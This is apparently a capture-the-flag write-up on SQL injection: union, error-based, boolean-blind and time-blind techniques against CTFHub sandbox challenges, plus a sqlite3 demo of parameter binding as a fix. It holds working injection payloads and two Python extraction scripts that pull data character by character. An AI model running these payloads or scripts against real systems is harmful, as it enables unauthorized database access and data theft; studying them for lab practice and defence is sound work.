Integer-type injection

Identifying an integer-type injection:
(1) Append a single quote: error
(2) Append and 1=1: normal
(3) Append and 1=2: error
This indicates an integer-type injection, and a union query is enough.
Payload:
id=2 order by 2
Find the displayed columns:
id=2 and 1=2 union select 1,2
Get the table names:
id=2 and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
Get the column names:
id=2 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag'
Get the contents:
id=2 and 1=2 union select 1,flag from flag
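As an added example (not part of the original writeup), the following sqlite3 script shows why the union payload above reaches the database and how integer validation plus parameter binding defeats it; the news(id, title) and flag(flag) tables and their rows are constructed for the demo, and the same fix applies to the quoted string-type variant in the next section.

```python
import sqlite3

# Constructed demo schema mirroring the writeup's tables: news(id, title) and flag(flag).
SCHEMA = """
create table news(id integer, title text);
insert into news values (1, 'first post'), (2, 'second post');
create table flag(flag text);
insert into flag values ('ctfhub{constructed_demo_value}');
"""

# The union payload from the integer-injection section of the writeup.
PAYLOAD = "2 and 1=2 union select 1,flag from flag"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_lookup(raw_id):
    # Builds the statement by string concatenation, the pattern the injection abuses:
    # the attacker-controlled value becomes part of the SQL text and is parsed as SQL.
    conn = fresh_db()
    sql = "select * from news where id=" + raw_id
    return conn.execute(sql).fetchall()


def safe_lookup(raw_id):
    # Hardened form: an id must be an integer, so reject anything else before touching
    # the database, then bind the value as a parameter so it is never parsed as SQL.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []  # non-integer id: no query is built at all
    conn = fresh_db()
    return conn.execute("select * from news where id=?", (news_id,)).fetchall()


if __name__ == "__main__":
    # The vulnerable path returns the flag row inside the news result; the safe path returns nothing.
    print("vulnerable:", vulnerable_lookup(PAYLOAD))
    print("safe:      ", safe_lookup(PAYLOAD))
```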

String-type injection

Identifying a string-type injection:
(1) Append a single quote (or double quote): error; normal again once a comment marker is appended
(2) Append 1' and 1=1#: normal
(3) Append 1' and 1=2#: error
Commonly used comment markers:
#
--+
Union-query injection:
2' order by 2 #
2' and 1=2 union select 1,2 #
2' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #
2' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='flag' #
2' and 1=2 union select 1,flag from flag #

Error-based injection

First, three statements commonly used for error-based injection:
(1) Error via floor:
and (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
where payload is the SQL you want to inject. Note that this statement limits the output to 64 characters.

(2) Error via updatexml:
and updatexml(1,payload,1)
This statement also limits the output length, to at most 32 characters, and it also constrains the payload's return type: it only takes effect when what the payload returns is not in XML format.

(3) Error via extractvalue:
and extractvalue(1,payload)
The output length is limited to at most 32 characters.


select * from news where id=1 or (updatexml(1,concat(0x7e,database(),0x7e),1))

select * from news where id=1 or (updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1))

select * from news where id=1 or (updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='flag'),0x7e),1))

Contents
Because updatexml limits the output length, the returned string may be truncated, so it usually has to be extracted as a left part and a right part.
select * from news where id=1 or (updatexml(1,concat(0x7e,(select flag from flag),0x7e),1))
Left part: ctfhub{c76caabdb3959de675165447

select * from news where id=1 or (updatexml(1,concat(0x7e,(select right(flag, 30) from flag),0x7e),1))
Right part: fhub{c76caabdb3959de675165447}
Removing the overlap between the right and left parts gives the flag:
ctfhub{c76caabdb3959de675165447}

Boolean-based blind injection

On a normal request the page returns only query_success.
On an error it shows only query_error, with no detailed error message to work from, and the request is a GET, which fits the preconditions for boolean-based blind injection.

# coding:utf-8
import sys
import requests

session = requests.session()
url = "http://challenge-cef754c463a1ef6d.sandbox.ctfhub.com:10800/?id=1 "
flag = ''
for i in range(1, 50):
    print(i)
    for j in range(38, 128):  # 38 128
        # print(j)
        # Enumerate the database name: sqli
        # str from position for length
        # payload = "and case ord(mid(database() from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
        # Enumerate the table names: flag, news
        # payload = "and case ord(mid((select group_concat(table_name) from information_schema.tables \
        # where table_schema=database()) from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
        # Enumerate the column names: flag
        # payload = "and case ord(mid((select group_concat(column_name) from information_schema.columns \
        # where table_name='flag') from {0} for 1)) when {1} then 1 else 0 end".format(i, j)
        # Enumerate the flag
        payload = 'and case ord(mid((select flag from flag) from {0} for 1)) when {1} then 1 else 0 end'.format(i, j)
        # print(url + payload)
        r = session.get(url=url + payload)
        # Stop automatically once the full value has been extracted: 127 is a non-printing
        # character, so after the last real character the next j reaches 127 and the program exits
        if j == 127:
            sys.exit()
        # The challenge returns query_success when the condition holds, so query_success in the
        # response means this character has been found; break out of the inner loop
        if "query_success" in r.text:
            flag += chr(j)
            print(flag)
            break

Time-based blind injection

Submitting each of the following in turn shows a difference in response time, so time-based blind injection can be used:
1 and if(1=1,sleep(3),1)
1 and if(1=0,sleep(3),1)

import requests
import time

url = "http://challenge-d691424bd2d907b4.sandbox.ctfhub.com:10800/?id=1 and "
result = ''
for i in range(1, 50):
    head = 32
    tail = 127
    # Binary search over the printable ASCII range for the character at position i
    while head < tail:
        mid = (head + tail) // 2
        # Enumerate the database name: sqli
        # payload = '1=if(ord(mid(database() from {0} for 1))>{1},sleep(2),1) --+'.format(i, mid)
        # Enumerate the table name: flag
        # payload = "1=if(ord(mid((select group_concat(table_name) from information_schema.tables \
        # where table_schema=database()) from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
        # Enumerate the column name: flag
        # payload = "1=if(ord(mid((select group_concat(column_name) from information_schema.columns \
        # where table_name='flag') from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
        # Enumerate the flag
        payload = "1=if(ord(mid((select flag from flag) from {0} for 1))>{1},sleep(2),1) --+".format(i, mid)
        start_time = time.time()
        r = requests.get(url + payload)
        end_time = time.time()
        # A delayed response means the character code is greater than mid
        if end_time - start_time > 1.5:
            head = mid + 1
        else:
            tail = mid
    # head stays at 32 only when no character matched, i.e. the value has been fully extracted
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)